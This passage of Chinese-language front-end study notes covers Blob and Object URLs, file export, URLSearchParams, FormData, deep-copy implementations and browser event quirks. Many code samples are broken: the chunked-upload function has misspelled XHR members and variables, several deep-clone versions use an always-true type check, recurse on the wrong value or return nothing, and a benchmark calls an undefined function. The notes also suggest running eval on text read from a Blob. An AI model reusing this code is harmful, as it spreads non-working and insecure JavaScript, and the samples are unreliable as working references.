对象一般代表一个不可变的文件对象或原始数据。如果你不需要修改它或者不 需要把它切分成更小的块,那这种格式是理想的(比如,可以把一个完整的 Blob 对 象传给 img 标签,参见 15.3 节“通过 XHR 下载数据”)。而如果你还需要再处理接 收到的二进制数据,那么选择 ArrayBuffer 应该更合适。 ArrayBuffer 表示一个普通的、固定长度的二进制数据缓冲。 Blob 对象表示一个不可变、原始数据的类文件对象。**Blob 表示的不一定是JavaScript原生格式的数据。File 接口基于Blob,继承了 blob 的功能并将其扩展使其支持用户系统上的文件**。 `Blob,Binary Large Object`的缩写,代表二进制类型的大对象。在Web中,Blob类型的对象表示不可变的类似文件对象的原始数据,通俗点说,就是**Blob对象是二进制数据,但它是类似文件对象的二进制数据**,因此**可以像操作File对象一样操作Blob对象,实际上,File继承自Blob**。 ```js // 返回一个新创建的 Blob 对象,其内容由参数中给定的数组串联组成 Blob(blobParts[, options]) // 参数blobParts,数组类型, 数组中的每一项连接起来构成Blob对象的数据, // 数组中的每项元素可以是ArrayBuffer(二进制数据缓冲区), ArrayBufferView,Blob,DOMString。或其他类似对象的混合体。 // 参数options,可选项,字典格式类型,可以指定如下两个属性: // 1、type,默认值为"",它代表了将会被放入到blob中的数组内容的MIME类型。 // 2、endings, 默认值为"transparent",用于指定包含行结束符\n的字符串如何被写入。 它是以下两个值中的一个: "native",表示行结束符会被更改为适合宿主操作系统文件系统的换行符; "transparent",表示会保持blob中保存的结束符不变。 // 如用字符串构建一个 blob var debug = {hello: "world"}; var blob = new Blob([JSON.stringify(debug, null, 2)], {type : 'application/json'}); // Blob对象有一个slice方法,返回一个新的Blob对象,包含了源Blob对象中制定范围内的数据。 // 其实就相当于截取字符串一样 var data = "abcdef"; var blob1 = new Blob([data]); var blob2 = blob1.slice(0,3); console.log(blob1); //输出:Blob {size: 6, type: ""} console.log(blob2); //输出:Blob {size: 3, type: ""} ``` 我们知道了,file 继承至 blob,同时又知道 blob 还可以截取的特性,因此我们就可以对大文件进行分片上传。因此参考代码可如下: ```js function uploadFile(file) { var chunkSize = 1024 * 1024; //每片1M大小 var totalSize = file.size; var chunkQuantity = Math.ceil(totalSize/chunkSize); //分片总数 var offset = 0; //偏移量 var reader = new FileReader(); reader.onload = function(e) { var xhr = new XMLHttpRequest(); xhr.open("POST", url); xhr.overrideMineType("application/octet-stream"); xhr.onreadstatechange = function() { if(xhr.readyState === 4 && xhr.status ===200) { ++offset; if(offset === chunkQuantity) { alerrt("上传完成"); } else if(offset === chunckQuantity-1) { blob = file.slice(offset*chunkSize, totalSize); reader.readAsBinaryString(blob); } else { blob = file.slice(offset*chunkSize, (offset+1)*chunckSize); reader.readAsBinaryString(blob); } }else { alert("上传出错"); } } if(xhr.sendAsBinary) { xhr.sendAsBinary(e.target.result); } else { xhr.send(e.target.result); } } var blob = file.slice(0, chunkSize); reader.readAsBinaryString(blob); } ``` 为什么使用**blob**呢? `Blob URL / Object URL`是一种伪协议,允许Blob和File对象用作图像,下载二进制数据链接等的URL源。 例如,不能处理Image对象的原始字节数据,因为它不知道如何处理它。它需要例如图像(二进制数据)通过URL加载。这适用于任何需要URL作为源的东西。不用上传二进制数据,而是通过URL提供回来,最好使用额外的本地步骤来直接访问数据而无需通过服务器。 对于编码为Base-64的字符串的Data-URI也是更好的选择。Data-URI的问题是每个char在JavaScript中占用两个字节。最重要的是,由于Base-64编码增加了33%。Blob是纯粹的二进制字节数组,它不像Data-URI那样具有任何重要的开销,这使得它们处理速度越来越快。 其实说白了,之所以要使用blob,是因为blob在web领域,给我们提供了一种操作数据流的一种方式,类似操作file。 之前项目中:后端先返回文件的列表,列表里有文件的id,然后渲染到页面上,然后再点击的时候将拿到的id再去请求后台的真正的合同,这个合同是字符串格式,先转成blob格式,然后再转成url格式,再作为iframe的src填入。。。 ```js // result就是字符串格式的合同文件 const blob = new Blob([result], { type: 'text/html' }); // 其实这个url的生命周期和创建它的窗口中的document绑定,也就是关闭页面了, // document没有了,这个url就失效了,不过每次都会新建不同的 const url = URL.createObjectURL(blob); this.$refs.iframe.src = url; ``` **Data URL 和 Blob URL什么区别**? Data URL对大家来说并不陌生,Web性能优化有一项措施:把小图片用base64编码直接嵌入到HTML文件中,实际就是利用了Data URL来获取图片数据。 - Blob URL得长度一般比较短,但Data URL因为直接存储图片base64编码后得数据,往往很长。当显示大图片时,使用Blob URL更优。 - Blob URL可以方便的使用XMLHttpRequest获取源数据,例如: ```js var blobUrl = URL.createObjectURL(new Blob(['Test'], {type: 'text/plain'})); var xhr = new XMLHttpRequest(); //如果是指xhr.responseType = 'blob',将返回一个Blob对象,而不是文本; //xhr.responseType = 'blob'; xhr.onload = function() { alert(xhr.responseText); } xhr.open('get', blobUrl); xhr.send(); ``` - 对于Data URL, 并不是所有浏览器都支持通过XMLHttpRequest获取源数据的。 - Blob URL只能在当前应用内部使用,把Blob URL复制到浏览器的地址栏中,是无法获取数据的。Data URL相比之下,就有很好的移植性,你可以在任意浏览器使用。 - 除了可以用作图片资源的网络地址,Blob URL也可以用作其他资源的网络地址,例如html文件、json文件等,为了保证浏览器能正确的解析Blob URL返回的文件类型,需要在创建Blob对象时指定相应的type: ```js // 其实就是,创建的时候写上mime,然后浏览器解析的时候,就会按照指定的格式解析了,不然浏览器不知道如何解析。 //创建HTML文件的Blob URL var data = "<div style='color:red;'This is a blob</div>"; var blob = new Blob([data], {type: 'text/html'}); // 'application/json' var blobUrl = URL.createObjectURL(blob); ``` **如何导出文件**? 一般生成导出文件常用的两种方式: 第一种:直接请求并输出文件流了(整个响应体都是数据流)。 第二种:先请求生成好Excel文件,返回给你链接,然后再请求下载。 第一种由于整个响应体都是二进制数据流,因此需在全局拦截器特殊对待这个响应体,可以根据响应类型单独做判断…… 第二种:一般很少采用,因为文件会经常变,每次变都需要生成一份…… 不管哪种,在请求时都必须声明。responseType:'blob',意思响应回来的数据类型是Blob……默认情况下是json文件…… ```js let res = await xxx(reqData); if (res instanceof Blob) { // 这里response是整个响应体,而不是单个的blob对象,因此要想获取后台的名字,可以通过这个方式 // let fileName = response.headers['content-disposition'].slice(20); let blob = new Blob([res], { type: "application/x-xlsx" }); let link = document.createElement("a"); link.href = window.URL.createObjectURL(blob); link.download = `仓组维度手推补货记录${Date.now()}.xlsx`; // 如果用fileName,可以:link.download = fileName // 当然给元素设置属性,还可以如下 // link.setAttribute("download", fileName); link.click(); } ``` new URL()返回值就是一个实例对象,包括下面这些属性和方法。 ```js // 已知url如下 var url = new URL('https://www.zhangxinxu.com:80/wordpress/?s=url#comments'); ``` - hash,URL地址中的锚链值,包含字符串'#',例如这里url.hash的返回值是'#comments' - host,包括协议端口号,www.zhangxinxu.com:80 - hostname,不包括端口号,www.zhangxinxu.com - href,完整的url, - origin,只读,包含URL协议,域名和端口,https://www.zhangxinxu.com:80 - port,端口 - protocol,URL地址的协议,包含:,https: - search,查询字符串,?s=url - searchParams,返回一个URLSearchParams对象,可以调用URLSearchParams对象各种方法,对查询字符串进行非常方便的处理,url.searchParams.get('s'); => url 方法: - toString(),返回的完整的URL地址,你可以理解为URL.href的另外一种形式,不过这个只能输出,不能修改值 - toJSON(),同样返回完整的URL地址,返回的字符串和href属性一样。 静态方法: - URL.createObjectURL(object) - URL.revokeObjectURL(objectURL),撤消之前使用URL.createObjectURL()创建的URL对象。其中参数objectURL表示之前使用URL.createObjectURL()创建的URL返回值。 平时我们想要解析url里的参数,需要写一个函数或者正则处理,其实可以直接使用 URLSearchParams(),使用如下: ```js new URL('https://www.zhangxinxu.com/wordpress/?s=url').searchParams.get('s'); // 'url' // 增加 var params = new URLSearchParams('?s=url') params.append('from', 'zxx'); params.toString(); // "s=url&from=zxx" // 删除 params.delete('s'); params.toString(); "from=zxx" // 遍历 for (let pair of params.entries()) { console.log(pair[0], pair[1]); } // from zxx params.forEach((val,key) => { console.log(val, key); }) // zxx from // 更多参考:https://www.zhangxinxu.com/wordpress/2019/08/js-url-urlsearchparams/ ``` **如何从Blob中提取数据**? 一种从Blob中读取内容的方法是使用 FileReader。以下代码将 Blob 的内容作为类型数组读取: ```js var reader = new FileReader(); reader.addEventListener("loadend", function() { // reader.result 包含被转化为类型数组 typed array 的 blob }); reader.readAsArrayBuffer(blob); // 当然 FileReader,还有很多其他方法, // 通过使用 FileReader 的其它方法可以把 Blob 读取为字符串或者数据URL。 ``` 另一种读取Blob中内容的方式是使用Response对象。下述代码将Blob中的内容读取为文本: ```js var text = await (new Response(blob)).text(); // 但是这种的话,没法直接使用里面的对象,可以使用eval // eval的参数是字符串,结果会生成在当前位置的执行上下文 let textObj = eval(text) ``` Blob 和 ArrayBuffer的区别: Blob虽然可以利用slice截取生成更小的片段,但是无法像数组那样操作某一位,而 ArrayBuffer可以具体操作某一个位置的二进制数据流。 参考:https://www.cnblogs.com/penghuwan/p/12053775.html **formData数据**? 主要用途有两个: - 将form表单元素的name与value进行组合,实现表单数据的序列化,从而减少表单元素的拼接,提高工作效率。 - 异步上传文件 ```js //通过FormData构造函数创建一个空对象 var formdata = new FormData(); //可以通过append()方法来追加数据,可以添加key重复的数据 formdata.append("name","laotie"); //通过get方法对值进行读取,只会获取到第一个 console.log(formdata.get("name"));//laotie //通过set方法对值进行设置 formdata.set("name","laoliu"); console.log(formdata.get("name"));//laoliu // 获取key为name的第一个值 formdata.get("name"); // 获取key为name的所有值,返回值为数组类型 formdata.getAll("name"); //如果key的值不存在会为数据添加一个key为name值为laoliu的数据 formdata.set("name","laoli"); //通过get方法读取key为name的第一个值 console.log(formdata.get("name"));//laoli // 如果key的值存在,会修改对应的value值 ``` ```js // 比如用第三方的上传文件功能: async uploadFile(param) { var fileObj = param.file; let formData = new FormData(); formData.append("file", fileObj); formData.append("type", "1"); try { let res = await XXX(formData); if (res.code === 0) { this.$message({ message: "导入成功", type: "success" }); } } catch (err) { this.$refs.upload.clearFiles(); } finally { } }, ``` #### ***Javascript相关*** ##### **深拷贝与浅拷贝** 参考[浅拷贝与深拷贝](https://juejin.im/post/59ac1c4ef265da248e75892b)、[深拷贝完美方法](https://juejin.im/post/5b20c9f65188257d7d719c1c) 浅拷贝方式: **1. Object.assign()**: - 不会拷贝对象继承的属性 - 会忽略不可枚举的属性 - 属性的数据属性/访问器属性 - 可以拷贝Symbol类型 **2. 扩展运算符** - 缺陷同Object.assign() - 如果都是基本类型,很方便 **3. Array.prototype.slice** slice() 方法返回一个新的数组对象,这一对象是一个由 begin和 end(不包括end)决定的原数组的浅拷贝。原始数组不会被改变。 在ES6以前,没有剩余运算符,Array.from的时候可以用 Array.prototype.slice将arguments类数组转为真正的数组,它返回一个浅拷贝后的的新数组。 ```js Array.prototype.slice.call({0: "aaa", length: 1}) //["aaa"] let arr = [1,2,3,4] console.log(arr.slice() === arr); //false ``` 当然还有类似`Array.prototype.concat()`这些可以返回新对象的方式,也可以理解为浅拷贝。 **注意:赋值和浅拷贝不同** - 赋值和浅拷贝不同,赋值只是复制了一份指针但仍指向同一个对象; - 浅拷贝是新建一个对象,但只复制一层对象的属性,不包括对象里面的为引用类型的数据 如下: 修改通过赋值得到的 obj2 中的基本数据会改变原始对象 obj1。而修改浅拷贝得到的 obj3则不会改变原始对象 obj1。其实就是浅拷贝重新开辟了内存空间,所以没有影响。 ```js var obj1 = { name: "zhangsan", age: "18" }; var obj2 = obj1; // 赋值 var obj3 = shallowCopy(obj1); // 浅拷贝 function shallowCopy(src) { var dst = Object.create(null); // 必须有至少一个参数 for (var prop in src) { if (src.hasOwnProperty(prop)) { dst[prop] = src[prop]; } } return dst; } obj2.name = "lisi"; obj3.age = "20"; console.log(obj1); //obj1 = { // 'name' : 'lisi', // 'age' : '18', //}; console.log(obj2); //obj2 = { // 'name' : 'lisi', // 'age' : '18', //}; console.log(obj3); //obj3 = { // 'name' : 'zhangsan', // 'age' : '20', //}; ``` **深拷贝方式**: **1. JSON.parse(JSON.stringify(obj))** 可谓问题多多。。。 - 不能复制function、正则、Symbol(不能复制,终端也不报错,只是没有复制过去而已) - 循环引用报错 - 相同的引用会被重复复制 - 拷贝的对象的值中如果有函数,undefined,symbol则经过JSON.stringify()序列化后的JSON字符串中这个键值对会消失 - 无法拷贝不可枚举的属性,无法拷贝对象的原型链 - 拷贝Date引用类型会变成字符串(而且还会发生时区变化的问题) - 拷贝RegExp引用类型会变成空对象 - 对象中含有NaN、Infinity和-Infinity,则序列化的结果会变成null - 无法拷贝对象的循环应用(即obj[key] = obj) 之前项目里,前端给后台传输一个时间对象时,后台拿到的时间比前端晚了8个小时,这就是因为请求无法发送对象,需要进行`JSON.stringfy()`格式化,时区问题就出现了 ```js // 下面的两个时间就相差8个小时。 new Date(); // Sun Mar 29 2020 11:03:26 GMT+0800 (中国标准时间) JSON.stringfy(new Date()); // ""2020-03-29T03:03:26.151Z"" ``` **2. 借用第三方库lodash,jQuery,zepto等** **3. 简版深拷贝等** ```js // 大致问题点: // 无法复制不可枚举的属性及Symbol类型 // 只针对了Object类型的做了迭代,但Array,Date,RegExp,Error,Function无法拷贝 // 对象有循环引用的问题 (如:obj.a = obj) function deepClone(obj) { let dest = Object.create(null); for (let prop in obj) { if (obj.hasOwnProperty(prop)) { typeof obj[prop] === "object" ? (dest[prop] = deepClone(obj[prop])) : (dest[prop] = obj[prop]); } } return dest; } ``` **4. 完美版深拷贝等**: ```js // 深拷贝版本一 // 该版本只考虑对象 function deepClone1(obj) { if (!obj || typeof obj !== "object") { return obj; } let resObj = Object.create(null); for (let item in obj) { if (obj.hasOwnProperty(item)) { typeof item === "object" ? deepClone(item) : (resObj[item] = obj[item]); } } return resObj; } var obj = { a: 1, b: 2 }; var obj2 = deepClone1(obj); // 深拷贝版本二 // 该版本兼容数组 function deepClone1(obj) { if (!obj || typeof obj !== "object") return obj; let resObj = Array.isArray(obj) ? [] : {}; Object.keys(obj).forEach(key => { if (resObj[key]) return; resObj[key] = deepClone1(obj[key]); }); return resObj; } var obj = { a: 1, b: 2, c: [1, 2, 3] }; var obj2 = deepClone1(obj); obj2; // 深拷贝版本三 // 兼容所有并解决循环引用和相同引用的问题 function deepClone1(obj) { // 为解决循环和相同引用的问题 let copyed = []; function _deep(obj){ if (!obj || typeof obj !== "object") return obj; for (let i = 0; i < copyed.length; i++) { if (copyed[i].target === obj) return copyed[i].copyTarget; } let resObj = Array.isArray(obj) ? [] : {}; copyed.push({ target: obj, copyTarget: resObj }); Object.keys(obj).forEach(key => { if (resObj[key]) return; resObj[key] = deepClone1(obj[key]); }); return resObj; } return _deep(obj); } // 深拷贝版本四 // 高效率版 function finalDeepClone(obj) { // 数组用WeakMap代替 let copyed = new WeakMap(); function _deep(obj){ if (!obj || typeof obj !== "object") return obj; if (copyed.has(obj)) return copyed.get(obj); let resObj = Array.isArray(obj) ? [] : {}; copyed.set(obj, resObj); Object.keys(obj).forEach(key => { if (resObj[key]) return; resObj[key] = _deep(obj[key]); }); return resObj; } return _deep(obj); } function deepCopy(target) { let copyed_objs = []; //此数组解决了循环引用和相同引用的问题,它存放已经递归到的目标对象 function _deepCopy(target) { if (typeof target !== "object" || !target) { return target; } for (let i = 0; i < copyed_objs.length; i++) { // 如果当前对象与数组中的对象相同,则不对其递归 if (copyed_objs[i].target === target) { return copyed_objs[i].copyTarget; } } let obj = {}; if (Array.isArray(target)) { obj = []; //处理target是数组的情况 } copyed_objs.push({ target: target, copyTarget: obj }); Object.keys(target).forEach(key => { if (obj[key]) { return; } obj[key] = _deepCopy(target[key]); }); return obj; } return _deepCopy(target); } function deepClone(target) { let tempMap = new WeakMap(); function _getType(target) { return Object.prototype.toString.call(val).slice(8, -1); } function _deep(target) { if (!target || _getType(target) !== 'Array' || _getType(target) !== 'Object') return target; if (tempMap.has(target)) return tempMap.get(target); let obj = Array.isArray(target) ? [] : {}; tempMap.set(target, obj); Object.keys(target).forEach(key => { if (obj[key]) return ; obj[key] = _deep(target); }); } return _deep(target); } function deepClone(target) { let tempMap = new WeakMap(); function _getType(val) { return Object.prototype.toString.call(val).slice(8, -1); } function _deep(target) { if (!target || _getType(target) !=='Array' || _getType(target) !=='Object') return target; if (tempMap.has(target)) return tempMap.get(target); let obj = Array.isArray(target) ? [] : {}; tempMap.set(target, obj); Object.keys(target).forEach(key => { if (obj[key]) return ; obj[key] = _deep(target[key]); }) } return _deep(target) } // 这种深拷贝效果更佳,拷贝日期有问题 function deepClone(target) { let tempMap = new WeakMap(); // 解决相同或循环引用 function _getType(val) { return Object.prototype.toString.call(target).slice(8, -1) } function _deep(target) { // 除了数组和object,其他都返回 // 当target是时间对象时,也需要直接返回 // if (!target || typeof target !== "object" || target instanceof Date) return target; // 下面如果用!['Array', 'Object'].incluedes(_getType(target));运行时间会拖慢100倍以上,因此用原生的方法 if (!target || _getType(target) !== "Array" || _getType(target) !== "Object") return target; if (tempMap.has(target)) return tempMap.get(target); let obj = Array.isArray(target) ? [] : {}; tempMap.set(target, obj); Object.keys(target).forEach(key => { if (obj[key]) return; obj[key] = _deep(target[key]); }); return obj; } return _deep(target); } // 可用如下代码测试 var obj = { num: 0, str: "", boolean: true, unf: undefined, nul: null, obj: { name: "我是一个对象", id: 1 }, arr: [0, 1, 2], func: function() { console.log("我是一个函数"); }, date: new Date(0), reg: new RegExp("/我是一个正则/ig"), [Symbol("1")]: 1 }; Object.defineProperty(obj, "innumerable", { enumerable: false, value: "不可枚举属性" }); // 有何意义?参数二其实就是在原型对象上定义 obj = Object.create(obj, Object.getOwnPropertyDescriptors(obj)); obj.a = {loop:obj}; // 为了测试两种方式对大数据的处理,对数据做如下修改 obj.list = new Array(10000).fill(0).map((item, index) => {return {a:index}}) // 测试时间 console.time(); var cloneObj = deepCopy(obj); console.timeEnd(); // : 175.843994140625ms console.time(); var cloneObj = goodDeepCopy(obj); console.timeEnd(); // : 12.794189453125ms ``` 上面用到了WeakMap,这里再说下Object,Map,WeakMap,Set,WeakSet的区别: - Object提供了一种(字符串 - 值)的hash结构,但是键(key)只能是字符串。 - Map相当于加强版的对象,键(key)的取值可以是所有类型的值。所以,Map比起Object更适合于作为哈希表。 ```js // Map的属性和方法 let map = new Map([ [0,1], [1,2], ]); console.log(map.size);// 2 // Map的方法 // set(key, value) 设置成员,返回的是Map本身 // get(key) 读取key对应的键值,如果找不到key,返回undefined // has(key) 根据key判断是否存在某个成员,返回一个布尔值 // delete(key) 删除成员,返回布尔值 // clear() 清空Map // 遍历的方法 // keys() 返回键名的遍历器 // values() 返回键值的遍历器 // entries() 返回所有成员的遍历器 // forEach() 遍历Map的所有成员 let map = new Map([ [0,1], [1,2], ]); for(let [key,value] of map.entries()){ console.log(key,value); } // 0 1 // 1 2 // 等价于 for(let [key,value] of map){ console.log(key,value); } // 还可以通过Array.form(), 扩展运算符转换将map为数组 Array.from(map); // [ [ 0, 1 ], [ 1, 2 ] ] [...map];// [ [ 0, 1 ], [ 1, 2 ] ] ``` WeakMap的特点: 1. 键名只能是对象(但不允许null) 2. 键名是对象的弱引用(不计入垃圾回收机制)。假如对象被回收,WeakMap成员中对应的键也被移除。(其实说白了,有利于垃圾回收,不容易造成内存泄漏) 3. 因为上面的特点2的原因,导致WeakMap没有遍历操作(keys、values、entries),没有size属性,也不支持clear。 参考:https://zh.javascript.info/weakmap-weakset ```js // WeakMap仅有的方法 set(key, value) 设置成员,返回的是WeakMap本身 get(key) 读取key对应的键值,如果找不到key,返回undefined has(key) 根据key判断是否存在某个成员,返回一个布尔值 delete(key) 删除成员,返回布尔值 ``` ##### **常见问题** ```js // 问:js中function开头加感叹号、分号什么意思? ;function(){} // 答:js中分号表示语句结束,在开头加上是为了压缩的时候和别的方法分隔一下,表示一个新的语句的开始。 // 而()、!、+、-、=等运算符,都将函数声明转换成函数表达式,消除了javascript引擎识别函数表达式和函数声明的歧义 // 如下其实就是自执行函数 !function(){alert(1);}(); void function(){alert(2);}(); var = { method:function(){} } (function(){ })() // 压缩后可能出现类似 }}(function 的代码,会被当成一个函数来执行,于是整体解析就错了 // 其实归根结底是解析器ASI(Automatic Semicolon Insertion)不能区分到底语句哪里应该终止 // 参考:https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Lexical_grammar // 逗号运算符,对它的每个操作数求值(从左到右),并返回最后一个操作数的值。 var x = 1; x = (x++, x); console.log(x); // expected output: 2 x = (2, 3); console.log(x); // 3 // 避免使用eval,Function构造函数, // 使用 eval 和 Function 构造函数是非常昂贵的操作,因为每次他们都会调用脚本引擎将源代码转换成可执行代码。 // eval它的功能是把对应的字符串解析成JS代码并运行; // 应该避免使用eval,不安全,非常耗性能(2次,一次解析成js语句,一次执行)。 //----- 取消请求 var xhr = new XMLHttpRequest(), method = "GET", url = "https://developer.mozilla.org/"; // open方法的参数3默认是ture,表示请求为异步。 xhr.open(method,url,true); xhr.send(); xhr.abort(); //------ 还可以设置定时器超时时间 var xhr = new XMLHttpRequest (); xhr.onreadystatechange = function () { if (this.readyState == 4) { clearTimeout(timeout); // do something with response data } } var timeout = setTimeout( function () { xhr.abort(); // call error callback }, 60*1000); xhr.open('GET', url, true); xhr.send(); // open()的第三个参数是表示是否异步发送请求…… // xhr.open方法第三个参数若为false表示为请求为同步…… // 意思就是必须等到服务器响应回来才执行下面的js代码……默认为true…… // 这里的 send()方法接收一个参数,即要作为请求主体发送的数据。 // 如果不需要通过请求主体发送数据,则必须传入 null,因为这个参数对有些浏览器来说是必需的。 // 调用 send()之后,请求就会被分派到服务器。 //------ 原始运算符始终比函数调用要高效 var min = Math.min(a,b); A.push(v); // 使用下面的效率高 var min = a < b ? a : b; A[A.length] = v; ``` ~、~~、| 运算符: - ~ 按位取反运算 - ~~ 取反两次,作用是去掉小数部分,因为位运算的操作值要求是整数,其结果也是整数,所以经过位运算的都会自动变成整数。你想使用比Math.floor()更快的方法,那就是它了。需要注意,对于正数,它向下取整;对于负数,向上取整;非数字取值为0 - | 通常用来取整 ```js ~~null; // => 0 ~~undefined; // => 0 ~~Infinity; // => 0 --NaN; // => 0 ~~0; // => 0 ~~{}; // => 0 ~~[]; // => 0 ~~(1/0); // => 0 ~~false; // => 0 ~~true; // => 1 ~~1.9; // => 1 ~~-1.9; // => -1 1.2 | 0 // 1 1.8 | 0 // 1 -1.2 | 0 // -1 console.time(); Array(1000).fill(1.2).map(item => Math.floor(item)); console.timeEnd() // default: 0.1298828125ms console.time(); Array(1000).fill(1.2).map(item => ~~(item)); console.timeEnd() // default: 0.075927734375ms ``` **DOMContentLoaded、load、pageshow**: - DOMContentLoaded事件,dom树生成完毕后执行,而非文档加载完毕(load事件) - load事件,文档加载完毕后执行 - pageshow 事件类似于 load 事件,load 事件在页面第一次加载时触发, pageshow 事件在每次加载页面时触发,即 load 事件在页面从浏览器缓存中读取时不触发。为了查看页面是直接从服务器上载入还是从缓存中读取,你可以使用 PageTransitionEvent 对象的 persisted 属性来判断。 如果页面从浏览器的缓存中读取该属性返回 ture,否则返回 false ```js window.addEventListener('pageshow', function(evt) { // 如果从缓存中读取 if (evt.persisted) { // todo } }) ``` **defer与async**: **注意:**如果用document.createElement创建的script元素默认是async;async和defer标识的script脚本可能在DOMContentLoaded事件前触发(多数),也可能在之后,但一定都在load事件之前。 一句话,defer是“渲染完再执行”,async是“下载完就执行”。另外,如果有多个defer脚本,会按照它们在页面出现的顺序加载,而多个async脚本是不能保证加载顺序的。 另外就是,**如果 script 无 src 属性,则 defer, async 会被忽略**;还有就是如果加载一个外链资源,设置了defer,如果一直加载不出来,也不会影响后面的,因为一般接口都会设置超时,等到超时了,也就是不会影响后面的脚本了。因此不会因为一个脚本的加载失败就停止执行后面的脚本。 ```js <script src="script.js"></script> // 没有 defer 或 async,浏览器会立即加载并执行指定的脚本,“立即”指的是在渲染该 script 标签之下的文档元素之前,也就是说不等待后续载入的文档元素,读到就加载并执行。 <script async src="script.js"></script> // 有 async,加载和渲染后续文档元素的过程将和 script.js 的加载与执行并行进行(异步)。 <script defer src="myscript.js"></script> // 有 defer,加载后续文档元素的过程将和 script.js 的加载并行进行(异步),但是 script.js 的执行要在所有元素解析完成之后,一般在DOMContentLoaded 事件触发之前完成,但也不一定。 // 为了尽快加快首屏的加载速度,最好将不涉及dom的js都加上这些标识。 ``` ***定时器*** 定时函数 setTimeout 和 setInterval 都可以接受字符串作为它们的第一个参数。 这个字符串总是在**全局作用域**中执行。 ```js // 另外就是他们都可以接受多于两个的参数, // 多余的参数便是传给函数的参数 setTimeout((x,y,z) => {console.log(x,y,z)}, 2000, 1,2,3); // 1,2,3 // 另外建议不要在调用定时器函数时,为了向回调函数传递参数而使用字符串的形式。 function foo(a, b, c) {} // 不要这样做 setTimeout('foo(1,2, 3)', 1000) // 可以使用匿名函数完成相同功能 setTimeout(function() { foo(1, 2, 3); }, 1000) ``` ***tap点透事件*** 在pc端大部分操作都是通过鼠标,而响应的就是鼠标事件,包括mousedown、mouseup、mousemove和click事件。一次点击行为,事件的触发过程为:mousedown -> mouseup -> click 三步。 在手机上没有鼠标,所以用触摸(touch)事件来实现类似的功能,touch事件包含touchstart、touchmove、touchend。**注意:手机上没有tap事件**,手指触发触摸事件的过程为:touchstart -> touchmove -> touchend。 **那tap事件怎么来的呢?** 在最早iphone的safar浏览器中,为了实现触屏中双击放大效果,当用户点击屏幕时后会判断在300ms内是否有第二次点击,如果有,就理解成双击,若没有就是单击, 就会触发click事件。。。 zepto中的 tap 通过兼听绑定在 document 上的 touch(end) 事件来完成 tap 事件的模拟的(其实是自定义一个tap事件),是通过事件冒泡实现的。因此当对一个弹层绑定tap事件后,点击后,touchend首先触发tap事件,弹层就会隐藏,然后等待300ms如果没有发生其他行为,则就会触发click事件。此时下层同样位置的DOM元素触发了click事件(如果是input框则会触发focus事件),看起来就像点击的target“穿透”到下层去了。 **注意:**是tap事件触发后,弹层瞬间消失,然后click事件才会作用到下面的元素上。。。因此如果弹层有个消失动画且持续时间大于300ms,那click事件就不会作用到下面的元素上,而是作用在弹层上。。。这也是解决的办法之一(还可以做透明层,300ms后隐藏透明层,目的就是防止click事件作用在下面的元素上) 另外还需注意,自定义的tap事件时绑定在document上的,因此点击后会有个冒泡过程。。。 而fastclick的解决办法,是取消了300ms之后的click事件,而是用touchend来模拟快速点击行为。FastClick在touchEnd的时候,在符合条件的情况下,主动触发了click事件,这样避免了浏览器默认的300毫秒等待判断。为了防止原生的click被触发,这里还通过event.preventDefault()屏蔽了原生的click事件。 ```js FastClick.prototype.onTouchEnd = function(event){ if (!this.needsClick(targetElement)) { // 如果这不是一个需要使用原生click的元素,则屏蔽原生事件,避免触发两次click event.preventDefault(); // 触发一次模拟的click this.sendClick(targetElement, event); } } ``` 而FastClick模拟的click事件是在touchEnd获取的真实元素上触发的,而不是通过坐标计算出来的元素。 **注意:**截至2015年底,大多数移动浏览器——尤其是 Chrome 和 Safari ——不再有300毫秒的触摸延迟,所以 fastclick 在新的浏览器上没有任何好处,而且有可能在你的应用程序中引入 bug。 参考:[fastClick使用说明][fastClickUseInstruction] 现代浏览器里有`dbclick`事件,而且事件对象里有个`detail`属性记录着点击的次数,单击为1,双击为2,其实就是**单击没有立即执行,而是等到判断不是双击的时候再执行**,如下测试代码: ```html <input type="button" onclick="aa()" ondblclick="bb()" value="点我"> <script type="text/javascript"> var timer = null; function aa() { clearTimeout( timer ); if ( event.detail == 2 ) return; timer = setTimeout( function () { console.log( '单击' ); }, 300 ); } function bb() { clearTimeout( timer ); console.log( '双击' ); } </script> ``` ***滚动穿透事件*** 参考:[滚动穿透][handleScrollTabURL] ```html <!-- 终极解决方案 --> <style> body.dialog-open { position: fixed; width: 100%; } </style> <script> (function() { var scrollTop = 0; // 显示弹出层 open.onclick = function() { // 在弹出层显示之前,记录当前的滚动位置 scrollTop = getScrollTop(); // 使body脱离文档流 document.body.classList.add("dialog-open"); // 把脱离文档流的body拉上去!否则页面会回到顶部! document.body.style.top = -scrollTop + "px"; mask.style.display = "block"; }; // 隐藏弹出层 close.onclick = function() { mask.style.display = "none"; // body又回到了文档流中 document.body.classList.remove("dialog-open"); // 滚回到老地方 to(scrollTop); }; function to(scrollTop) { document.body.scrollTop = document.documentElement.scrollTop = scrollTop; } function getScrollTop() { return document.body.scrollTop || document.documentElement.scrollTop; // 或者下面 // return document.scrollingElement.scrollTop; } })(); // 在vue项目里还可以如下,监听是否显示弹窗的标识 // 注意点,一个页面,有效的判断是哪个元素在滚动,有时候不太容易,因此很多时候给一个元素绑定了scroll事件,他并不会执行 // 此时,可以尝试利用document.scrollingElement来实现滚动。scrollingElement是新标准,兼容pc和移动 watch: { showDialog(newVal) { if (newVal) { // 消除移动端滚动穿透 // 打开弹窗时,需要找到滚动元素(有高度,有滚动条),记录当前滚动位置 // 添加fixed定位,因为fixed定位会导致页面滚动到顶部,这里通过js再移动回来 this.scrollTop = document.scrollingElement.scrollTop; document.scrollingElement.style.position = 'fixed'; document.scrollingElement.style.top = `-${this.scrollTop}px`; // 上面两句代码还可以用如下: // 这里其实就可以想到一个道理,要多留意细节,多学习才能知道更多 // document.scrollingElement.style.cssText = `position:fixed;top:-${this.scrollTop}px`; } else { // 等到弹窗关闭时,还需要恢复定位,且位置保持不变。 // 这里有个注意事项,不同的定位方式导致元素的文档流模式不同,因此需要使用对应文档流的方法。 // 正常文档流,可以使用滚动,但定位模式下,只能使用定位方式,比如top document.scrollingElement.style.position = 'unset'; document.scrollingElement.scrollTop = this.scrollTop; // document.scrollingElement.scrollTo(0, this.scrollTop) // 这种方式也行 } } } </script> ``` **定制滚动条样式**::-webkit-scrollbar CSS伪类选择器影响了一个元素的滚动条的样式,伪类选择器类似::after,可以给任何元素添加。关于滚动条主要有以下几个选择器 **注意:**其实伪类的话一般是一个冒号,两个冒号的是伪元素。 - ::-webkit-scrollbar — 整个滚动条的样式,一般用来控制整个滚动条的整体样式 - 